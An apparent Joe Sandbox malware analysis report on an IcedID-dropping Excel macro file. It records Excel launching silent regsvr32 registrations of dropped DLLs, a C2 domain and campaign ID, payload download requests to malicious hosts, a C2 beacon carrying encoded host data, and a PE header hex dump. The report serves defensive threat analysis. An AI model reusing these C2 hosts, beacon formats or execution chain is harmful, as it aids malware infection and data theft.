Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Vac.list07-20214862208.xlsm

Overview

General Information

Sample Name:Vac.list07-20214862208.xlsm
Analysis ID:444731
MD5:49dda1569fdceeb75d6bf6b3cd293e75
SHA1:8f77afedef8985e2c48a70d6ae082afc3a48c55f
SHA256:ded09606ba0d53a60f51abcb8254decc7cb49e8a4e26ad8e97f6ee49a7dd12ef
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2644 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2416 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2908 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2852 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2088452556.0000000000190000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27c6:$internal_name: loader_dll_64.dll
    • 0x30b4:$string0: _gat=
    • 0x3114:$string1: _ga=
    • 0x30ec:$string2: _gid=
    • 0x30cc:$string3: _u=
    • 0x3026:$string4: _io=
    • 0x30d8:$string5: GetAdaptersInfo
    • 0x2b16:$string6: WINHTTP.dll
    • 0x27ea:$string7: DllRegisterServer
    • 0x27fc:$string8: PluginInit
    • 0x3080:$string9: POST
    • 0x3140:$string10: aws.amazon.com
    00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      Process Memory Space: regsvr32.exe PID: 2908JoeSecurity_IcedID_1Yara detected IcedIDJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.regsvr32.exe.3c0000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        4.2.regsvr32.exe.190000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        4.2.regsvr32.exe.190000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2644, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2416

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 4.2.regsvr32.exe.3c0000.1.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY
        Source: unknownHTTPS traffic detected: 143.204.91.74:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
        Source: global trafficDNS query: name: thousandsyears.download
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 143.204.91.74:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: astrocycle.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 14:03:20 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 408Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ok0%2BKH3qYq2KE6v3gQLN3TWTjlXs%2FKCRGpa%2FlFhmTNEoEITtRmc8v%2F0WKD6n6Q3yMMghYJeW2oB30YxmpG2A3fj2joIQxvcX8ud1RSYOYd%2BwmI%2BaTcYISYPeXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9603d29d64e2b-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:8053:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=353036303133:416C627573:30363131453532434638444631434333; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: Joe Sandbox ViewIP Address: 172.67.198.51 172.67.198.51
        Source: Joe Sandbox ViewIP Address: 143.204.91.74 143.204.91.74
        Source: Joe Sandbox ViewIP Address: 104.21.37.209 104.21.37.209
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 143.204.91.74:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55CFCD6F.pngJump to behavior
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:8053:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=353036303133:416C627573:30363131453532434638444631434333; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idz5h_yHz14Itn1k8Sx6CKvYZbnNxlkFvpEWQBqIphWoboBCUUTE-gug==X-Amz-Cf-PopFRA50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idz5h_yHz14Itn1k8Sx6CKvYZbnNxlkFvpEWQBqIphWoboBCUUTE-gug==X-Amz-Cf-PopFRA50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com 